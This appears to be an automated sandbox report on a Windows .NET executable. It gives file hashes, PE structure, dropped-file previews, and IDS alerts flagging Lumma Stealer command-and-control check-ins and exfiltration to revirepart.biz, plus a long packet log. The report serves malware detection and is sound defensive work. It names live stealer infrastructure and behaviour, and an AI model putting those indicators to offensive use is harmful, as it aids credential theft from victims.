                                                                  Size (bytes):8386
                                                                  Entropy (8bit):3.7042609150357624
                                                                  Encrypted:false
                                                                  SSDEEP:192:R6l7wVeJOA6l6Y9sSUjngmfZUYxfjprQ89bcWsfuLUm:R6lXJZ6l6Y2SUjngmfWY5jc1fud
                                                                  MD5:1C671253E951F552D5ABCC1C2C3C2093
                                                                  SHA1:ADB38A4070FBE54F762ECEFB389408FB440F3F5C
                                                                  SHA-256:31308B3F2C28FCA85F365734DE55A4B9EF8604DCE24CE3456FD724994D874CEB
                                                                  SHA-512:F0A44EE5B6E7B80013178E7443C774EF63C1BE3E72792278E29E5FFFF1F35EB9C73FDA9BB919CD2BBCB3689547BD8D47335C9AF3FF9720CBA9126A6C04AE43B4
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.8.<./.P.i.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4737
                                                                  Entropy (8bit):4.500871348874029
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwWl8zsaJg77aI98kqWpW8VYq0Ym8M4Jx2FIk+q8vlpqyN7npOd:uIjfoI77L7VFJgKGopOd
                                                                  MD5:1A27D0C3E875B6BFDF9A083AF01A5707
                                                                  SHA1:1DB0C9261DDDB1E35E4BD43E5252ED97FFDD5E25
                                                                  SHA-256:8CC8DCA8E072A8B273F2C711AAC7ABD22B2554F54EB550220F7419F89C1EEDDE
                                                                  SHA-512:4D227A0C0E6C286B53DB64A20FA1154AAF9E6A9181B08E89580D4E6FDB3D6D90097753875151C595490DF51C65439B63A2EF165DD0E11BD739D5B31D19B6A5DE
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600507" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                  Process:C:\Users\user\Desktop\b.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):462848
                                                                  Entropy (8bit):7.1257309071219375
                                                                  Encrypted:false
                                                                  SSDEEP:12288:aklrtKjg1YBxbVonQXhT0doOFdNreYw3ZJyNnFJ/tPZirx1XTY6jyPCMIExFqJoL:DvKjKYBxbVonQXhT0doOFdNreYw3ZJyO
                                                                  MD5:EBC77EA19ED66BC10494A862C694C4D7
                                                                  SHA1:BB27DD01C052598DE09C5460FE241CB61BE86DE1
                                                                  SHA-256:1287FC59877EDEABFCCCDCB48ADCC0D626A12A4F466F496551859ACD5E8E95C2
                                                                  SHA-512:32EAE184B9E13D4501226A24C28EB368ED783662358E2642AD210DD7542F6AF66753554F63EB71292A9238EBBDC4B1FC02F6E9C376584DB6B72E100B8C345F81
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L...q.@g...........!.........v...............................................@............@.............................|.......P............................ ......\...............................x...@...............T............................text............................... ..`.rdata...\.......^..................@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.465916496289131
                                                                  Encrypted:false
                                                                  SSDEEP:6144:wIXfpi67eLPU9skLmb0b4NWSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbs:VXD94NWlLZMM6YFHY+s
                                                                  MD5:92F78B2AB1B72F32F21A4F36858FF709
                                                                  SHA1:0D425F12BFE278C953CC5A3B637C57F1C7C1122C
                                                                  SHA-256:F14E9D52AFCBE72EC283E32C567990E93C0CE053FBE3DEB881D8174EA4FB8C0F
                                                                  SHA-512:FF86D0F4E22E2A032F63A6893DCFCDD94F2B819EF7AB4CF3BDB2F8756552F90F55AE775BCE379FF9F8D92E2381B54F2D98DEC8EAA56B6C4AC24FC6A41F44EB0A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmb....=..............................................................................................................................................................................................................................................................................................................................................M...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\b.exe
                                                                  File Type:ASCII text, with very long lines (350), with CRLF, LF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1411
                                                                  Entropy (8bit):4.539958446792231
                                                                  Encrypted:false
                                                                  SSDEEP:24:7v74NuayMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4jyMff2p8p14nrPKktp
                                                                  MD5:7548DE235C6FF508119DBDAFE31226A0
                                                                  SHA1:9AF86E79C82BF0D0C3D7145DA7A41AAAD2E2F90C
                                                                  SHA-256:F7281B8DFBA6ADD95C1606327A1DC2E29D748FD680215E825F3BC756F5683BDF
                                                                  SHA-512:712C158DFD4CABAB490D42F04CE2A8C815D92B8A1BD591A7C3CC26DB41AB93902C13590B6F9353B183D47C3EB20AF9124788557E843719DD36DFF283C0B07E4D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "RubyLiamViolet" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetString
                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.765253938991967
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:b.exe
                                                                  File size:716'800 bytes
                                                                  MD5:1d08526fc81b1d62195f4e5dea52bb6f
                                                                  SHA1:caeaa9d75af4555ecc6367dd32cd541123c5e5b6
                                                                  SHA256:5af91198860f878466493a6d92481fcc88d59a182cec02812ce6b3dcd1f0fa38
                                                                  SHA512:0ca26f2932933b4341d21e62873a818af13f4ab838da9a5274ebf5c5aa48653f3675ee805232aa31703e99b8adadebff9af9b78b59158a68e3d792c0d8070c62
                                                                  SSDEEP:12288:lhQGkvIZqiNSyk5IztFOZNzrn9fgkkAxjFS10dNy81Dtdd9am6wjYJ6OwUkXoK5b:lhQVJuINzrn53px5ndsGrdn6
                                                                  TLSH:50E48D9C766072EFC867D472DEA81CB4EA5074BB971F4207A02706AD9E1D88BCF150F6
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.@g..............0..............`... ... ....@.. ....................................@................................
                                                                  Icon Hash:90cececece8e8eb0
                                                                  Entrypoint:0x4b600a
                                                                  Entrypoint Section:
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows cui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6740A872 [Fri Nov 22 15:51:14 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [004B6000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x926f40x57.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x640.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xb60000x8
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x920000x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  m@ka0x20000x8ef5c0x8f000b33644dca1db622a0eeec01488cbaf72False1.0003175535402098data7.999658471887131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .text0x920000x1ef800x1f000d818b86ae86d7715e48499313b884147False0.3296764742943548data4.689866894400597IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xb20000x6400x8006752790ea098d13cb7ab0fcc0109979eFalse0.35009765625data3.5595325261658877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xb40000xc0x2009d7743fe20d48f4946db51a87cf62226False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  0xb60000x100x200a93ef1ee99c8d5918b18fcaa9159b379False0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0xb20a00x3b4data0.43248945147679324
                                                                  RT_MANIFEST0xb24540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-23T10:25:00.042087+01002057646ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz)1192.168.2.4567451.1.1.153UDP
                                                                  2024-11-23T10:25:01.670163+01002057647ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI)1192.168.2.449730104.21.43.198443TCP
                                                                  2024-11-23T10:25:01.670163+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.43.198443TCP
                                                                  2024-11-23T10:25:02.355799+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.43.198443TCP
                                                                  2024-11-23T10:25:02.355799+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.43.198443TCP
                                                                  2024-11-23T10:25:03.908693+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.88.250443TCP
                                                                  2024-11-23T10:25:04.617752+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732104.21.88.250443TCP
                                                                  2024-11-23T10:25:04.617752+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.88.250443TCP
                                                                  2024-11-23T10:25:05.901261+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.88.250443TCP
                                                                  2024-11-23T10:25:06.597888+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449734104.21.88.250443TCP
                                                                  2024-11-23T10:25:06.597888+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734104.21.88.250443TCP
                                                                  2024-11-23T10:25:08.400820+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.88.250443TCP
                                                                  2024-11-23T10:25:11.575585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.88.250443TCP
                                                                  2024-11-23T10:25:13.846176+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.88.250443TCP
                                                                  2024-11-23T10:25:16.603881+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.88.250443TCP
                                                                  2024-11-23T10:25:18.738157+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.88.250443TCP
                                                                  2024-11-23T10:25:20.152926+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449747104.21.88.250443TCP
                                                                  2024-11-23T10:25:21.447907+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.88.250443TCP
                                                                  2024-11-23T10:25:22.151291+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749104.21.88.250443TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 23, 2024 10:25:00.356985092 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:00.357043028 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:00.357125044 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:00.361007929 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:00.361027956 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:01.670044899 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:01.670162916 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:01.677969933 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:01.677999020 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:01.678178072 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:01.721828938 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:01.725856066 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:01.725856066 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:01.725940943 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:02.355789900 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:02.355858088 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:02.355910063 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:02.358843088 CET49730443192.168.2.4104.21.43.198
                                                                  Nov 23, 2024 10:25:02.358861923 CET44349730104.21.43.198192.168.2.4
                                                                  Nov 23, 2024 10:25:02.600756884 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:02.600843906 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:02.600939989 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:02.601265907 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:02.601319075 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:03.908443928 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:03.908693075 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:03.921215057 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:03.921269894 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:03.921463013 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:03.923414946 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:03.923455000 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:03.923490047 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:04.617729902 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:04.617789984 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:04.617855072 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:04.618025064 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:04.618066072 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:04.618093014 CET49732443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:04.618108034 CET44349732104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:04.689454079 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:04.689534903 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:04.689631939 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:04.689894915 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:04.689929008 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:05.901159048 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:05.901261091 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:05.902239084 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:05.902249098 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:05.902446985 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:05.908123016 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:05.908144951 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:05.908185005 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.597893000 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.597937107 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.597966909 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.597990990 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.598014116 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.598026037 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.598088980 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.598140955 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.598140955 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.605808020 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.605912924 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.606014013 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.606031895 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.614334106 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.614384890 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.614403963 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.622677088 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.622737885 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.622761011 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.674992085 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.789493084 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.793265104 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.793337107 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.793335915 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.793387890 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.800611973 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.800657034 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:06.800683022 CET49734443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:06.800700903 CET44349734104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:07.097143888 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:07.097232103 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:07.097327948 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:07.097650051 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:07.097698927 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:08.400733948 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:08.400820017 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:08.402050018 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:08.402076960 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:08.402288914 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:08.409656048 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:08.409841061 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:08.409884930 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:08.409960985 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:08.409979105 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:10.172521114 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:10.172604084 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:10.172668934 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:10.172784090 CET49737443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:10.172840118 CET44349737104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:10.269525051 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:10.269566059 CET44349740104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:10.269620895 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:10.270113945 CET49740443192.168.2.4104.21.88.250
                                                                  Nov 23, 2024 10:25:10.270126104 CET44349740104.21.88.250192.168.2.4
                                                                  Nov 23, 2024 10:25:11.575505972 CET44349740104.21.88.250192.168.2.4
